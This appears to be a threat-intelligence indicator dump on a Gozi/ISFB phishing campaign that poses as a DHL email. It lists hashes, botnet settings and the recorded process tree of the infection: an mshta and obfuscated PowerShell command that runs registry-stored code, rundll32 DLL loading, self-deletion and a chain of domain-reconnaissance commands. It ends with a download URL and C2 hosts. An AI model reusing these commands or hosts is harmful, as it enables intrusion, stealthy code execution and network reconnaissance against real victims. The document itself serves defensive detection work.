07.07.2022 | Gozi_ifsb | 3000 | 

******************************

Sender: communicationsIT@dhl.it
Subject: Scaduto al 30-06-2022

******************************

.xls a7210d9c96813885238dcd4c7d6a6c08cb41220c65d7ce547ec17fde959d233e
.dll 20351bf93e117a01a601e5fcd6b83250e42e001a81cc9bf660e3079516a30f08

******************************

botnet - 3000
base_path - /images/

******************************

C:\Windows\Explorer.EXE

rundll32.exe C:\Users\Admin\AppData\Local\Temp\3a9ee4bc7f3ea02691545e64d9630d68.dll,#1

rundll32.exe C:\Users\Admin\AppData\Local\Temp\3a9ee4bc7f3ea02691545e64d9630d68.dll,#1

mshta.exe" "about:<hta:application><script>Wl9n='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wl9n).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\E61B1840-0D02-083C-C77A-91BCEB4E55B0\\\LocalSettings'));if(!window.flag)close()</script>"

powershell.exe" new-alias -name ptrvsjcf -value gp; new-alias -name ecbftq -value iex; ecbftq ([System.Text.Encoding]::ASCII.GetString((ptrvsjcf "HKCU:Software\AppDataLow\Software\Microsoft\E61B1840-0D02-083C-C77A-91BCEB4E55B0").FolderOptions))

csc.exe /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wdkjuadd\wdkjuadd.cmdline"

cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD2C.tmp" "c:\Users\Admin\AppData\Local\Temp\wdkjuadd\CSCAF228F73E1684314B2B33E2944558AE.TMP"

csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5z11chos\5z11chos.cmdline"

cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE55.tmp" "c:\Users\Admin\AppData\Local\Temp\5z11chos\CSC8DD6CD269B1E47D1B2905565197F23DF.TMP"

cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\3a9ee4bc7f3ea02691545e64d9630d68.dll"

ping  localhost -n 5 

"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\467E.bin1"

systeminfo.exe  

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, , 

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

net  view 

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

nslookup  127.0.0.1 

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

tasklist.exe  /SVC 

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

driverquery.exe  

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

reg.exe  query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s 

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

net  config workstation 

C:\Windows\system32\net1  config workstation 

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

nltest  /domain_trusts 

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

nltest  /domain_trusts /all_trusts 

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

net  view /all /domain 

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

net  view /all 

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\467E.bin1"

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\467E.bin1 > C:\Users\Admin\AppData\Local\Temp\467E.bin & del C:\Users\Admin\AppData\Local\Temp\467E.bin1"

C:\Windows\System32\RuntimeBroker.exe -Embedding

**************************************

.dll drop

https://moreinvesrotial.com

c2's

deohomexm.at
79.110.52.244
23.227.202.64
79.110.52.164
79.110.52.97
